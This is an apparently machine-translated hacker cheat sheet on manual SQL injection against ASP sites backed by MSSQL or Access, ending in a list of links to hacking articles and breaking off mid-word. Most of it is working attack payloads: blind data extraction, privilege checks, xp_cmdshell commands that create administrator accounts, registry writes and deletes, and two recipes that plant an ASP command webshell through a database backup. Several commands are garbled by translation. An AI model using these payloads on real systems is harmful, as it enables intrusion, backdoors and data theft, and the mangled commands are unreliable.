Manual SQL Injection

Author:System_Exp

For example, when the query id is 50, if the user transfers the recent parameter 50 and 1 = 1, if the filter is not set, you can directly find it, SQL injection is generally the most common in ASP programs,

Take a look at the following
1. Determine whether injection exists.
; And 1 = 1
; And 1 = 2

2. Determine whether it is mssql.
; And user> 0

3. Determine the Database System
; And (select count (*) from sysobjects)> 0 mssql
; And (select count (*) from msysobjects)> 0 access

4. The injection parameter is a character
And [query condition] and =

5. parameters are not filtered during search.
And [query condition] and % 25 =

6. Guess the database
; And (select Count (*) from [database name])> 0

7. Guess the field
; And (select Count (field name) from database name)> 0

8. Length of records in the guess Field
; And (select top 1 len (field name) from database name)> 0

9. (1) obtain the ascii value of a field (access)
; And (select top 1 asc (mid (field name, 1, 1) from database name)> 0

(2) Guess the ascii value of a field (mssql)
; And (select top 1 unicode (substring (field name, 1, 1) from database name)> 0

10. Test the permission structure (mssql)
; And 1 = (select IS_SRVROLEMEMBER (sysadmin ));--
; And 1 = (select IS_SRVROLEMEMBER (serveradmin ));--
; And 1 = (select IS_SRVROLEMEMBER (setupadmin ));--
; And 1 = (select IS_SRVROLEMEMBER (securityadmin ));--
; And 1 = (select IS_SRVROLEMEMBER (diskadmin ));--
; And 1 = (select IS_SRVROLEMEMBER (bulkadmin ));--
; And 1 = (select IS_MEMBER (db_owner ));--

11. add mssql and system accounts
; Exec master. dbo. sp_addlogin username ;--
; Exec master. dbo. sp_password null, username, password ;--
; Exec master. dbo. sp_addsrvrolemember sysadmin username ;--
; Exec master. dbo. xp_cmdshell net user username password/workstations: */times: all/passwordchg: yes/passwordreq: yes/active: yes/add ;--
; Exec master. dbo. xp_mongoshell net user username password/add ;--
; Exec master. dbo. xp_mongoshell net localgroup administrators username/add ;--

12. (1) traverse the directory
; Create table dirs (paths varchar (100), id int)
; Insert dirs exec master. dbo. xp_dirtree c:
; And (select top 1 paths from dirs)> 0
; And (select top 1 paths from dirs where paths not in (paths obtained in the previous step)>)

(2) traverse directories
; Create table temp (id nvarchar (255), num1 nvarchar (255), num2 nvarchar (255), num3 nvarchar (255 ));--
; Insert temp exec master. dbo. xp_availablemedia; -- get all current drives
; Insert into temp (id) exec master. dbo. xp_subdirs c:; -- get the subdirectory list
; Insert into temp (id, num1) exec master. dbo. xp_dirtree c:; -- get the directory tree structure of all subdirectories
; Insert into temp (id) exec master. dbo. xp_shareshell type c: webindex. asp; -- view the File Content

13. mssql Stored Procedures
Xp_regenumvalues registry Root Key, subkey
; Exec xp_regenumvalues HKEY_LOCAL_MACHINE, SOFTWAREMicrosoftWindowsCurrentVersionRun returns all key values in multiple Record Sets
Xp_regread Root Key, subkey, key value name
; Exec xp_regread HKEY_LOCAL_MACHINE, softwaremicrosoftwindowscur1_version, CommonFilesDir, return the value of the specified key
Xp_regwrite Root Key, subkey, Value Name, value type, Value
There are two value types: REG_SZ and REG_DWORD.
; Exec xp_regwrite HKEY_LOCAL_MACHINE, softwaremicrosoftwindowscur1_version, TestvalueName, reg_sz, hello write to the Registry
Xp_regdeletevalue Root Key, subkey, Value Name
Exec xp_regdeletevalue HKEY_LOCAL_MACHINE, SOFTWAREMicrosoftWindowsCurrentVersion, TestvalueName delete a value
Xp_regdeletekey HKEY_LOCAL_MACHINE, SOFTWAREMicrosoftWindowsCurrentVersionTestkey, including all values under this key

14. mssql backup creates webshell
Use model
Create table cmd (str image );
Insert into cmd (str) values (<% Dim oScript %> );
Backup database model to disk = c: l. asp;

15. mssql built-in functions
; And (select @ version)> 0 to get the Windows version number
; And user_name () = dbo determines whether the current system's connected user is sa
; And (select user_name ()> 0 blow the user connected to the current system
; And (select db_name ()> 0 to get the database currently connected

16. Simple webshell
Use model
Create table cmd (str image );
Insert into cmd (str) values (<% = server. createobject ("wscript. shell "cmd.exe c (" cmd.exe/c "& request (" c ")). stdout. readall %> );
Backup database model to disk = g: wwwtestl. asp;

When a request is sent, it is used as follows:
Http: // ip/l. asp? C = dir

SQL Injection tianshu-ASP Injection Vulnerabilities (Xiaozhu)
Http://fox.163n.com/xyhack/hhh/list.asp? Id = 222

MSSQL cross-Database Query! Night)
Http://fox.163n.com/xyhack/hhh/list.asp? Id = 66

Squeeze the last drop of MS SQL
Http://fox.163n.com/xyhack/hhh/list.asp? Id = 309

SQL statement reference and detailed description of record set objects
Http://fox.163n.com/xyhack/hhh/list.asp? Id = 124

SQL Server Stored Procedures
Http://fox.163n.com/xyhack/hhh/list.asp? Id = 314

Use mssql backup to create webshell
Http://fox.163n.com/xyhack/hhh/list.asp? Id = 219

SQL _Injection advanced application
Http://fox.163n.com/xyhack/hhh/list.asp? Id = 221

Cross-Site SQL injection (laokai ))
Http://fox.163n.com/xyhack/hhh/list.asp? Id = 383

Weird SQL injection (AMANL)
Http://fox.163n.com/xyhack/hhh/list.asp? Id = 320

Advanced SQL Injection in SQL Server Applications)
Http://fox.163n.com/xyhack/hhh/list.asp? Id = 338

How to use SQL injection to traverse directories (sinka QQ: 20355)
Http://fox.163n.com/xyhack/hhh/list.asp? Id = 316

SQL Injection skills (translated by demonalex)
Http://fox.163n.com/xyhack/hhh/list.asp? Id = 301

SQL database attacks
Asp? Id = 152 "> http://fox.163n.com/xyhack/hhh/list.asp? Id = 152

SQL Injection Attack Technology (JSW)
Http://fox.163n.com/xyhack/hhh/list.asp? Id = 208

SQL _Injection advanced application (apachy)
Http://fox.163n.com/xyhack/hhh/list.asp? Id = 221

Uncommon SQL injection methods (Guilin veterans)
Http://fox.163n.com/xyhack/hhh/list.asp? Id = 231

Backup a shell
Http://fox.163n.com/xyhack/hhh/list.asp? Id = 274

Php + mysql injection statement construction (≯ Super Hei)
Http://fox.163n.com/xyhack/hhh/list.asp? Id = 386

Advanced SQL Injection with MySQL (angel)
Http://fox.163n.com/xyhack/hhh/list.asp? Id = 405

Linjection (My) SQL via PHP
Http://fox.163n.com/xyhack/hhh/list.asp? Id = 420

Oracle SQL language
Http://fox.163n.com/xyhack/hhh/list.asp? Id = 206
Manual SQL Injection

Required tools: SQL Query Analyzer and SqlExec Sunx Version

1. To remove the xp_cmdshell extension process, use the following statement:

If exists (select * from dbo. sysobjects where id = object_id (N [dbo]. [xpcmdshell]) and OBJECTPROPERTY (id, NIsExtendedProc) = 1)
Exec sp_dropextendedproc N [dbo]. [xp_cmdshell]

2. To add the xp_cmdshell extension process, use the following statement:

(1) SQL Query Analyzer

Sp_addextendedproc xp_cmdshell, @ dllname = xplog70.dll

(2) First in SqlExec Sunx Versi